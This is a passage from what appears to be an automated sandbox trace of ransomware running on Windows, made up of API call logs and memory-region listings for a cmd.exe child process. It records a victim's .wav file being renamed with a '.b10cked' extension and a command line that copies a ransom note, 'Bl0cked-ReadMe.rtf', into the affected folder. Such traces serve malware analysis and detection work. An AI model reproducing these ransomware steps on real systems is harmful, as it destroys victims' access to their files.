"c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\cii3zm5ag7.wav"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\cii3zm5ag7.wav.b10cked"), dwFlags=0x3) returned 1 [0227.484] FindClose (in: hFindFile=0x90ef0 | out: hFindFile=0x90ef0) returned 1 [0227.484] _vsnwprintf (in: _Buffer=0x4a4f5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x30ef78 | out: _Buffer=" 1") returned 9 [0227.484] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.484] GetFileType (hFile=0x7) returned 0x2 [0227.484] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0227.484] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30ef04 | out: lpMode=0x30ef04) returned 1 [0227.484] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.484] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x30ef38 | out: lpConsoleScreenBufferInfo=0x30ef38) returned 1 [0227.484] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a504640, nSize=0x2000, 
Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0227.485] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a504640, nSize=0x2000, Arguments=0x30ef78 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0227.485] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a504640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x30ef5c, lpReserved=0x0 | out: lpBuffer=0x4a504640*, lpNumberOfCharsWritten=0x30ef5c*=0x1a) returned 1 [0227.485] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.485] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0227.485] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.485] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4f41ac | out: lpMode=0x4a4f41ac) returned 1 [0227.486] _get_osfhandle (_FileHandle=0) returned 0x3 [0227.486] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4f41b0 | out: lpMode=0x4a4f41b0) returned 1 [0227.486] SetConsoleInputExeNameW () returned 0x1 [0227.486] GetConsoleOutputCP () returned 0x1b5 [0227.486] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4f4260 | out: lpCPInfo=0x4a4f4260) returned 1 [0227.486] SetThreadUILanguage (LangId=0x0) returned 0x409 [0227.486] exit (_Code=0) Process: id = "602" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e80" os_pid = "0xfb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This 
Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34126 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34127 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34128 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34129 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 34130 start_va = 0x4a4d0000 end_va = 0x4a51bfff entry_point = 0x4a4d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34131 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34132 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34133 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34134 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 34135 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34166 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000010000" filename = "" Region: id = 34167 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34168 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34169 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 34170 start_va = 0x4d0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 34171 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34172 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34173 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34174 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34175 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34176 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" 
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34177 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34178 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34179 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34180 start_va = 0x4e0000 end_va = 0x5a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 34181 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34182 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34183 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 34184 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 34185 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 34186 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 34187 start_va = 0x5b0000 end_va = 0x6b0fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 34188 start_va = 0x6c0000 end_va = 0x12bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 34189 start_va = 0x12c0000 end_va = 0x1422fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012c0000" filename = "" Thread: id = 833 os_tid = 0xdd4 [0227.053] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fa0c | out: lpSystemTimeAsFileTime=0x26fa0c*(dwLowDateTime=0xbae6f580, dwHighDateTime=0x1d440a9)) [0227.053] GetCurrentProcessId () returned 0xfb0 [0227.053] GetCurrentThreadId () returned 0xdd4 [0227.053] GetTickCount () returned 0x3ea1f [0227.053] QueryPerformanceCounter (in: lpPerformanceCount=0x26fa04 | out: lpPerformanceCount=0x26fa04*=28384213038) returned 1 [0227.054] GetModuleHandleA (lpModuleName=0x0) returned 0x4a4d0000 [0227.054] __set_app_type (_Type=0x1) [0227.054] __p__fmode () returned 0x76b331f4 [0227.054] __p__commode () returned 0x76b331fc [0227.054] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4f21a6) returned 0x0 [0227.054] __getmainargs (in: _Argc=0x4a4f4238, _Argv=0x4a4f4240, _Env=0x4a4f423c, _DoWildCard=0, _StartInfo=0x4a4f4140 | out: _Argc=0x4a4f4238, _Argv=0x4a4f4240, _Env=0x4a4f423c) returned 0 [0227.054] GetCurrentThreadId () returned 0xdd4 [0227.054] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xdd4) returned 0x38 [0227.054] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0227.054] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0227.055] SetThreadUILanguage (LangId=0x0) returned 0x409 [0227.055] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0227.055] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, 
phkResult=0x26f99c | out: phkResult=0x26f99c*=0x0) returned 0x2 [0227.055] VirtualQuery (in: lpAddress=0x26f9d3, lpBuffer=0x26f96c, dwLength=0x1c | out: lpBuffer=0x26f96c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0227.055] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f96c, dwLength=0x1c | out: lpBuffer=0x26f96c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0227.055] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f96c, dwLength=0x1c | out: lpBuffer=0x26f96c*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0227.055] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f96c, dwLength=0x1c | out: lpBuffer=0x26f96c*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0227.055] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f96c, dwLength=0x1c | out: lpBuffer=0x26f96c*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xb0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0227.055] GetConsoleOutputCP () returned 0x1b5 [0227.055] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4f4260 | out: lpCPInfo=0x4a4f4260) returned 1 [0227.055] SetConsoleCtrlHandler (HandlerRoutine=0x4a4ee72a, Add=1) returned 1 [0227.055] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.055] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0227.056] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.056] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4f41ac | out: lpMode=0x4a4f41ac) returned 1 [0227.056] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.056] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0227.056] _get_osfhandle 
(_FileHandle=0) returned 0x3 [0227.056] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4f41b0 | out: lpMode=0x4a4f41b0) returned 1 [0227.056] _get_osfhandle (_FileHandle=0) returned 0x3 [0227.056] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0227.057] GetEnvironmentStringsW () returned 0x330198* [0227.057] FreeEnvironmentStringsW (penv=0x330198) returned 1 [0227.057] GetEnvironmentStringsW () returned 0x330198* [0227.057] FreeEnvironmentStringsW (penv=0x330198) returned 1 [0227.057] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e90c | out: phkResult=0x26e90c*=0x40) returned 0x0 [0227.057] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e914, lpData=0x26e918, lpcbData=0x26e910*=0x1000 | out: lpType=0x26e914*=0x0, lpData=0x26e918*=0xc0, lpcbData=0x26e910*=0x1000) returned 0x2 [0227.057] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e914, lpData=0x26e918, lpcbData=0x26e910*=0x1000 | out: lpType=0x26e914*=0x4, lpData=0x26e918*=0x1, lpcbData=0x26e910*=0x4) returned 0x0 [0227.057] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e914, lpData=0x26e918, lpcbData=0x26e910*=0x1000 | out: lpType=0x26e914*=0x0, lpData=0x26e918*=0x1, lpcbData=0x26e910*=0x1000) returned 0x2 [0227.057] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e914, lpData=0x26e918, lpcbData=0x26e910*=0x1000 | out: lpType=0x26e914*=0x4, lpData=0x26e918*=0x0, lpcbData=0x26e910*=0x4) returned 0x0 [0227.057] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e914, lpData=0x26e918, lpcbData=0x26e910*=0x1000 | out: lpType=0x26e914*=0x4, lpData=0x26e918*=0x40, lpcbData=0x26e910*=0x4) returned 0x0 [0227.057] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, 
lpType=0x26e914, lpData=0x26e918, lpcbData=0x26e910*=0x1000 | out: lpType=0x26e914*=0x4, lpData=0x26e918*=0x40, lpcbData=0x26e910*=0x4) returned 0x0 [0227.057] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e914, lpData=0x26e918, lpcbData=0x26e910*=0x1000 | out: lpType=0x26e914*=0x0, lpData=0x26e918*=0x40, lpcbData=0x26e910*=0x1000) returned 0x2 [0227.057] RegCloseKey (hKey=0x40) returned 0x0 [0227.058] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e90c | out: phkResult=0x26e90c*=0x40) returned 0x0 [0227.058] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e914, lpData=0x26e918, lpcbData=0x26e910*=0x1000 | out: lpType=0x26e914*=0x0, lpData=0x26e918*=0x40, lpcbData=0x26e910*=0x1000) returned 0x2 [0227.058] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e914, lpData=0x26e918, lpcbData=0x26e910*=0x1000 | out: lpType=0x26e914*=0x4, lpData=0x26e918*=0x1, lpcbData=0x26e910*=0x4) returned 0x0 [0227.058] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e914, lpData=0x26e918, lpcbData=0x26e910*=0x1000 | out: lpType=0x26e914*=0x0, lpData=0x26e918*=0x1, lpcbData=0x26e910*=0x1000) returned 0x2 [0227.058] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e914, lpData=0x26e918, lpcbData=0x26e910*=0x1000 | out: lpType=0x26e914*=0x4, lpData=0x26e918*=0x0, lpcbData=0x26e910*=0x4) returned 0x0 [0227.058] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e914, lpData=0x26e918, lpcbData=0x26e910*=0x1000 | out: lpType=0x26e914*=0x4, lpData=0x26e918*=0x9, lpcbData=0x26e910*=0x4) returned 0x0 [0227.058] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e914, lpData=0x26e918, lpcbData=0x26e910*=0x1000 | out: 
lpType=0x26e914*=0x4, lpData=0x26e918*=0x9, lpcbData=0x26e910*=0x4) returned 0x0 [0227.058] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e914, lpData=0x26e918, lpcbData=0x26e910*=0x1000 | out: lpType=0x26e914*=0x0, lpData=0x26e918*=0x9, lpcbData=0x26e910*=0x1000) returned 0x2 [0227.058] RegCloseKey (hKey=0x40) returned 0x0 [0227.058] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863ba [0227.058] srand (_Seed=0x5b8863ba) [0227.058] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Bl0cked-ReadMe.rtf\"" [0227.058] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Bl0cked-ReadMe.rtf\"" [0227.058] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a4f5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0227.059] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3318f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0227.059] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0227.059] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0227.059] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0227.059] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0227.059] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0227.059] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0227.059] _wcsicmp 
(_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0227.059] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0227.059] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0227.059] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0227.059] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0227.059] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0227.059] GetEnvironmentStringsW () returned 0x3322e8* [0227.059] FreeEnvironmentStringsW (penv=0x3322e8) returned 1 [0227.059] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0227.060] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0227.060] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0227.060] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0227.060] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0227.060] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0227.060] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0227.060] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0227.060] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0227.060] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0227.060] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f6d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0227.060] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f6d8, lpFilePart=0x26f6d4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f6d4*="Desktop") returned 0x18 [0227.060] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0227.060] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f454 | out: lpFindFileData=0x26f454) 
returned 0x330028 [0227.060] FindClose (in: hFindFile=0x330028 | out: hFindFile=0x330028) returned 1 [0227.060] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f454 | out: lpFindFileData=0x26f454) returned 0x330028 [0227.061] FindClose (in: hFindFile=0x330028 | out: hFindFile=0x330028) returned 1 [0227.061] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f454 | out: lpFindFileData=0x26f454) returned 0x330028 [0227.061] FindClose (in: hFindFile=0x330028 | out: hFindFile=0x330028) returned 1 [0227.061] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0227.061] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0227.061] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0227.061] GetEnvironmentStringsW () returned 0x332b08* [0227.061] FreeEnvironmentStringsW (penv=0x332b08) returned 1 [0227.061] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a4f5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0227.062] GetConsoleOutputCP () returned 0x1b5 [0227.062] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4f4260 | out: lpCPInfo=0x4a4f4260) returned 1 [0227.062] GetUserDefaultLCID () returned 0x409 [0227.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a4f4950, cchData=8 | out: lpLCData=":") returned 2 [0227.063] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f818, cchData=128 | out: lpLCData="0") returned 2 [0227.063] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f818, cchData=128 | out: lpLCData="0") returned 2 [0227.063] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f818, cchData=128 | out: lpLCData="1") returned 2 [0227.063] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a4f4940, cchData=8 | out: lpLCData="/") returned 2 [0227.063] GetLocaleInfoW 
(in: Locale=0x409, LCType=0x31, lpLCData=0x4a4f4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0227.063] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a4f4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0227.063] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a4f4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0227.063] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a4f4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0227.063] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a4f4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0227.063] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a4f4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0227.063] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a4f4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0227.063] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a4f4930, cchData=8 | out: lpLCData=".") returned 2 [0227.063] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a4f4920, cchData=8 | out: lpLCData=",") returned 2 [0227.063] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0227.064] GetConsoleTitleW (in: lpConsoleTitle=0x3208f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0227.064] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0227.064] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0227.065] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0227.065] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0227.066] _wcsicmp (_String1="type", _String2=")") returned 75 [0227.066] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0227.066] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0227.066] _wcsicmp (_String1="IF", _String2="type") returned -11 [0227.066] _wcsicmp (_String1="IF/?", 
_String2="type") returned -11 [0227.066] _wcsicmp (_String1="REM", _String2="type") returned -2 [0227.066] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0227.227] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.227] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.227] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.227] GetFileType (hFile=0x7) returned 0x2 [0227.228] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0227.228] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f710 | out: lpMode=0x26f710) returned 1 [0227.228] _dup (_FileHandle=1) returned 3 [0227.228] _close (_FileHandle=1) returned 0 [0227.235] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0227.235] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x26f6e0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0227.237] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0227.237] GetConsoleTitleW (in: lpConsoleTitle=0x26f510, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0227.237] _wcsicmp (_String1="type", _String2="DIR") returned 